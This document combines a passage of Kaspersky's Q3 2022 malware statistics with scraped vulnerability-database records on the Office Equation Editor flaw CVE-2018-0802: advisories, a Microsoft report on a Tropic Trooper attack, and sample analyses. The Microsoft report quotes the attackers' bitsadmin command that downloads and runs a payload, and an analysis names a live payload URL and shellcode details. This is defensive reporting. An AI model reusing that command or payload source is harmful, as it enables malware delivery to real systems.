In addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious modification of the Chinese MiMi instant messaging application.

### TOP 20 threats for macOS

| | **Verdict** | **%**\* |
|---|---|---|
| 1 | AdWare.OSX.Amc.e | 14.77 |
| 2 | AdWare.OSX.Pirrit.ac | 10.45 |
| 3 | AdWare.OSX.Agent.ai | 9.40 |
| 4 | Monitor.OSX.HistGrabber.b | 7.15 |
| 5 | AdWare.OSX.Pirrit.j | 7.10 |
| 6 | AdWare.OSX.Bnodlero.at | 6.09 |
| 7 | AdWare.OSX.Bnodlero.ax | 5.95 |
| 8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 |
| 9 | AdWare.OSX.Pirrit.ae | 5.27 |
| 10 | Trojan-Downloader.OSX.Agent.h | 3.87 |
| 11 | AdWare.OSX.Bnodlero.bg | 3.46 |
| 12 | AdWare.OSX.Pirrit.o | 3.32 |
| 13 | AdWare.OSX.Agent.u | 3.13 |
| 14 | AdWare.OSX.Agent.gen | 2.90 |
| 15 | AdWare.OSX.Pirrit.aa | 2.85 |
| 16 | Backdoor.OSX.Twenbc.e | 2.85 |
| 17 | AdWare.OSX.Ketin.h | 2.82 |
| 18 | AdWare.OSX.Pirrit.gen | 2.69 |
| 19 | Trojan-Downloader.OSX.Lador.a | 2.52 |
| 20 | Downloader.OSX.InstallCore.ak | 2.28 |

_\* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

As usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," took the top place for the second quarter in a row. This application displays fake system issue messages and offers the full version for purchase to fix them. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.

### Geography of threats for macOS

**TOP 10 countries and territories by share of attacked users**

| | **Country or territory**\* | **%**\*\* |
|---|---|---|
| 1 | France | 1.71 |
| 2 | Canada | 1.70 |
| 3 | Russia | 1.57 |
| 4 | India | 1.53 |
| 5 | United States | 1.52 |
| 6 | Spain | 1.48 |
| 7 | Australia | 1.36 |
| 8 | Italy | 1.35 |
| 9 | Mexico | 1.27 |
| 10 | United Kingdom | 1.24 |

_\* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._

_\*\* Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

France, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.

## IoT attacks

### IoT threat statistics

In Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.

| Telnet | 75.92% |
|---|---|
| SSH | 24.08% |

_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_

A majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.

| Telnet | 97.53% |
|---|---|
| SSH | 2.47% |

_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_

**TOP 10 threats delivered to IoT devices via Telnet**

| | **Verdict** | **%**\* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 28.67 |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 |
| 3 | Backdoor.Linux.Mirai.ba | 11.63 |
| 4 | Backdoor.Linux.Mirai.cw | 10.94 |
| 5 | Backdoor.Linux.Gafgyt.a | 3.69 |
| 6 | Backdoor.Linux.Mirai.ew | 3.49 |
| 7 | Trojan-Downloader.Shell.Agent.p | 2.56 |
| 8 | Backdoor.Linux.Gafgyt.bj | 1.63 |
| 9 | Backdoor.Linux.Mirai.et | 1.17 |
| 10 | Backdoor.Linux.Mirai.ek | 1.08 |

_\* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._

Detailed IoT-threat statistics are published in the DDoS report for Q3 2022.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._

### Countries and territories that serve as sources of web-based attacks: TOP 10

_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._

In Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-attack sources by country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_

### Countries and territories where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.

Note that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.

| | **Country or territory**\* | **%**\*\* |
|---|---|---|
| 1 | Taiwan | 19.65 |
| 2 | Belarus | 17.01 |
| 3 | Serbia | 15.05 |
| 4 | Russia | 14.12 |
| 5 | Algeria | 14.01 |
| 6 | Turkey | 13.82 |
| 7 | Tunisia | 13.31 |
| 8 | Bangladesh | 13.30 |
| 9 | Moldova | 13.22 |
| 10 | Palestine | 12.61 |
| 11 | Yemen | 12.58 |
| 12 | Ukraine | 12.25 |
| 13 | Libya | 12.23 |
| 14 | Sri Lanka | 11.97 |
| 15 | Kyrgyzstan | 11.69 |
| 16 | Estonia | 11.65 |
| 17 | Hong Kong | 11.52 |
| 18 | Nepal | 11.52 |
| 19 | Syria | 11.39 |
| 20 | Lithuania | 11.33 |

_\* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._

_\*\* Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._

On average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.

### Countries and territories where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

These rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | **Country or territory**\* | **%**\*\* |
|---|---|---|
| 1 | Turkmenistan | 46.48 |
| 2 | Yemen | 45.12 |
| 3 | Afghanistan | 44.18 |
| 4 | Cuba | 40.48 |
| 5 | Tajikistan | 39.17 |
| 6 | Bangladesh | 37.06 |
| 7 | Uzbekistan | 37.00 |
| 8 | Ethiopia | 36.96 |
| 9 | South Sudan | 36.89 |
| 10 | Myanmar | 36.64 |
| 11 | Syria | 34.82 |
| 12 | Benin | 34.56 |
| 13 | Burundi | 33.91 |
| 14 | Tanzania | 33.05 |
| 15 | Rwanda | 33.03 |
| 16 | Chad | 33.01 |
| 17 | Venezuela | 32.79 |
| 18 | Cameroon | 32.30 |
| 19 | Sudan | 31.93 |
| 20 | Malawi | 31.88 |

_\* Excluded are countries with relatively few Kaspersky users (under 10,000)._

_\*\* Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._

On average worldwide, **Malware**-class local threats were registered on 14.74% of users' computers at least once during Q3. Russia scored 16.60% in this ranking.

_Source: "IT threat evolution in Q3 2022. Non-mobile statistics", Securelist, published 2022-11-18 (<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)._

_Microsoft advisory description (record last seen 2023-05-27):_

A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) containing a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.

The security update addresses the vulnerability by removing Equation Editor functionality.
For more information on this change, please refer to the following article: <https://support.microsoft.com/en-us/help/4057882>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-09T08:00:00", "type": "mscve", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802"], "modified": "2018-01-12T08:00:00", "id": "MS:CVE-2018-0802", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-0802", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2018-12-03T23:45:41", "description": "Several weeks ago, the Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. 
Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the attack.\n\nThe attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.\n\nWith the high risk determined for affected machines, [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>) blocked these machines' access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.\n\nFinally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer had a foothold on affected machines, returning the machines to a normal working state. Once the threat was remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.\n\n## Investigating alert timelines and process trees\n\nWe discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office application activity, dubious cross-process injections, and machine-learning-based indications of anomalous execution flows. The sheer volume and variety of the alerts told us something serious was going on.\n\n\n\n_Figure 1. 
Multiple alerts triggered by the attack_\n\nThe first detection related to the attack was fired by a suspicious _EQNEDT32.exe_ behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns. Using [Office 365 ATP](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) Threat Explorer, we found the specific emails that the attackers used to distribute the malicious document.\n\nUsing Windows Defender Security Center, we further investigated the detected executable and found that the attackers used _bitsadmin.exe_ to download and execute a randomly named payload from a remote server:\n \n \n bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\\fY.exe && start %USERPROFILE%\\fY.exe\n\nMachine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used the [process hollowing](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/12/detecting-stealthier-cross-process-injection-techniques-with-windows-defender-atp-process-hollowing-and-atom-bombing/>) technique to run code in the memory of a system process.\n\nIn some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATP's [Antimalware Scan Interface (AMSI)](<https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal>) sensor exposed all the attacker scripts, which we observed to be meant mostly for data exfiltration.\n\n\n\n_Figure 2. Process tree_\n\nUsing the timeline and process tree views in Windows Defender Security Center, we were able to identify the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. 
As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.\n\n\n\n_Figure 3. Campaign attack chain_\n\n## Device risk calculation and incident prioritization\n\nThe alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines to the top of the queue, helping ensure security operations teams can immediately notice and prioritize them. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in their lifespan.\n\nIn this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple components and multiple types of anomalous behavior exhibited by an attack across the infection chain.\n\n## Windows Defender ATP-driven conditional access\n\nWhen Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by [Azure Active Directory](<https://azure.microsoft.com/en-us/services/active-directory/>).\n\nThis integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. 
When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. **[Read more about Conditional access here](<https://techcommunity.microsoft.com/t5/What-s-New/Conditional-access-Ensuring-that-only-secure-users-and-devices/ba-p/292510>)**.\n\n## Signal sharing and threat remediation across Microsoft Threat Protection\n\nThreat signal sharing across Microsoft services through the [Intelligent Security Graph](<https://cloudblogs.microsoft.com/microsoftsecure/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) ensures that threat remediation is orchestrated across [Microsoft Threat Protection](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783>). In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attack's entry point and protecting Office 365 ATP customers from the attack.\n\nThis threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.\n\nMeanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved. 
\nWindows Defender ATP, Office 365 ATP, and Azure Active Directory are just some of the many Microsoft services now integrated through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.\n\n## Conclusion\n\nThe new device risk calculation mechanism in [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.\n\nThrough [Conditional access](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/conditional-access-windows-defender-advanced-threat-protection>), compromised machines are blocked from accessing critical corporate assets. 
This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.\n\nTo test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, [**sign up for a free trial**](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>).\n\n \n\n \n\n_**Hadar Feldman** and **Yarden Albeck**_ \n_Windows Defender ATP team_\n\n \n\n \n\n## Indicators of attack (IoCs)\n\n### Command and control IP addresses and URLs:\n\n * 199[.]192[.]23[.]231\n * 45[.]122[.]138 [.]6\n * lovehaytyuio09[.]com\n\n### Files (SHA-256):\n\n * 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)\n * 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)\n * 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)\n * 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)\n\n \n\n \n\n \n\n[](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)\n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).\n\n \n\nThe post [Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/>) appeared first on [Microsoft Secure](<https://cloudblogs.microsoft.com/microsoftsecure>).", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-28T21:46:48", "type": "mssecure", "title": "Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0802"], "modified": "2018-11-28T21:46:48", "id": "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "href": 
"https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2021-06-08T19:04:40", "description": "### Description\n\nMicrosoft Office is prone to a memory-corruption vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Office 2007 SP3 \n * Microsoft Office 2010 Service Pack 2 (32-bit editions) \n * Microsoft Office 2010 Service Pack 2 (64-bit editions) \n * Microsoft Office 2013 Service Pack 1 (32-bit editions) \n * Microsoft Office 2013 Service Pack 1 (64-bit editions) \n * Microsoft Office 2016 (32-bit edition) \n * Microsoft Office 2016 (64-bit edition) \n * Microsoft Office 2016 Click-to-Run (C2R) for 32-bit edition \n * Microsoft Office 2016 Click-to-Run (C2R) for 64-bit edition \n * Microsoft Office Compatibility Pack Service Pack 3 \n * Microsoft Word 2007 SP3 \n * Microsoft Word 2010 Service Pack 2 (32-bit editions) \n * Microsoft Word 2010 Service Pack 2 (64-bit editions) \n * Microsoft Word 2013 RT Service Pack 1 \n * Microsoft Word 2013 Service Pack 1 (32-bit editions) \n * Microsoft Word 2013 Service Pack 1 (64-bit editions) \n * Microsoft Word 2016 (32-bit edition) \n * Microsoft Word 2016 (64-bit edition) \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous 
activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "symantec", "title": "Microsoft Office CVE-2018-0802 Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2018-01-09T00:00:00", "id": "SMNTC-102347", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102347", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-12-02T18:49:48", "description": "We recently obtained a Word document with a .doc extension which, on inspection, is actually a Rich Text Format document. Opening it in a test environment produced a network connection and the execution of a program, so the sample was determined to be a malicious document. Preliminary analysis found it to be a new sample exploiting the CVE-2017-11882 vulnerability. 
CVE-2017-11882 and CVE-2018-0802 are both vulnerabilities in the processing logic of the Office Equation Editor, and are currently the conventional means used in malicious Office document attacks. Analyses of the root cause and exploitation of these vulnerabilities are already available online, for example 360 Skyeye Lab's technical analysis of the latest [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) technique for CVE-2017-11882 that abuses the Office Equation Editor's special processing logic, and Tencent PC Manager's analysis of samples that combine the NDAY vulnerability CVE-2017-11882 with the 0Day vulnerability CVE-2018-0802 to spread remote-control Trojans. This sample differs slightly from those analysed before and should be a variant of the CVE-2017-11882 exploit. \nI. Basic behavior \nTest environment: Windows 7 x64 SP1 Chinese edition, Office 2010 Chinese edition. \nAfter the vulnerable sample is opened, the displayed document content is garbled, as shown below. \n![](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png!small) \nIn addition, an executable named emre.exe is created in the %temp% directory and run. Packet capture shows that emre.exe is produced by downloading http://ghthf.cf/cert/ochicha.exe, as shown below. \n![](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png!small) \nII. Debugging the vulnerability \n1. Sample structure \nOpened in WinHex, the file looks as in the two figures below. The document header is directly followed by the displayed content. \n![](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png!small) \nThis is followed by the object, as shown below. \n![](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png!small) \n2. Preliminary RTF analysis \nAnalysing the file with rtfobj gives the result shown below. The CLSID 0002ce02-0000-0000-c000-000000000046 can be seen, i.e. the Microsoft Equation Editor object. \n![](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png!small) \n![](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png!small) \nFrom the figure we can see that the object name is \"eQuatiON native\"; the normal object name \"Equation Native\" has had its case changed, possibly also in pursuit of [AV evasion](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>). \n3. Vulnerability debugging \nFollowing the various vulnerability analysis reports, we go straight to debugging the vulnerable function at 0041160F. \n![](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png!small) \nAfter the 11th rep operation, as in the figure below, the stack is overwritten with 0x0043F775. \n![](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png!small) \n![](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png!small) \nThe value at 0x0043F775 in the EQNEDT32.EXE process is C3, which happens to be the retn instruction. \n![](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png!small) \nAfter it executes, control jumps to the shellcode location, as shown below: \n![](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png!small) \n4. Shellcode debugging and analysis \nThe shellcode is located in the eQuatiON native object. \nIt is divided into two parts. The first starts at offset 0x0826 (the bytes B9 C439E66A, shown in the figure above as the disassembly starting at 0018F354) and runs to 0x0851, followed by the four bytes 0x0043F7F5 (the address of the RETN instruction in the EQNEDT32.EXE process). The second part runs from 0x089E to the end. \n![](https://image.3001.net/images/20181124/1543028371_5bf8be938ff06.png!small) \nThe assembly by which the first part of the shellcode jumps to the second part is shown below: \n![](https://image.3001.net/images/20181124/1543029212_5bf8c1dc1ce30.png!small) \nAnalysis shows that this segment of shellcode performs a series of jmp instructions, for shellcode obfuscation and protection. For example, as shown in the figure below: \n![](https://image.3001.net/images/20181124/1543029376_5bf8c280e0d65.png!small)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-12-02T00:00:00", "type": "myhack58", "title": "A CVE-2017-11882 vulnerability is a new variation of a sample of the debugging and analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2018-12-02T00:00:00", "id": "MYHACK58:62201892253", "href": "http://www.myhack58.com/Article/html/3/62/2018/92253.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-25T17:29:45", "description": "![](/Article/UploadPic/2018-12/20181225205545726.png) \nRecently we intercepted an attack sample: a Word document with a .doc extension whose actual format is RTF. Analysing the document's composition shows that it uses the CVE-2017-11882 and CVE-2018-0802 vulnerabilities, with an embedded Excel object used to trigger them. The PE file it drops is used to collect sensitive information from the target user. \n\nI. Basic situation \nIn the test environment (Windows 7 x64, Office 2010), opening the document and monitoring processes shows that after the winword process runs, it first executes excel.exe, then runs EQNEDT32.exe, then runs cmd.exe, and finally runs the A.X process; EQNEDT32.exe runs twice. Seeing EQNEDT32.exe, this looks like a CVE-2017-11882 or CVE-2018-0802 sample. \nWhen opened, the document is displayed as an empty document, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545737.png) \nAt a glance one might think it is empty, but on closer inspection there is a small black dot icon in the top left, as shown below. \n![](/Article/UploadPic/2018-12/20181225205545312.png) \nDouble-clicking it brings up the pop-up window shown below, with the message \"Windows cannot open this file: A.X\". Clearly the \"small black dot\" is an external object. \n![](/Article/UploadPic/2018-12/20181225205545780.png) \nRight-clicking the object and selecting \"Packager Shell Object\" lets us view the object's \"Properties\", as shown below. \n![](/Article/UploadPic/2018-12/20181225205545220.png) \nIts object properties are shown below: \n![](/Article/UploadPic/2018-12/20181225205545229.png) \nFrom this we can conclude that the sample embeds a PE object in the RTF, which is dropped into the %temp% directory by default when the document is opened, and then uses CVE-2017-11882 or CVE-2018-0802 to execute the process. 
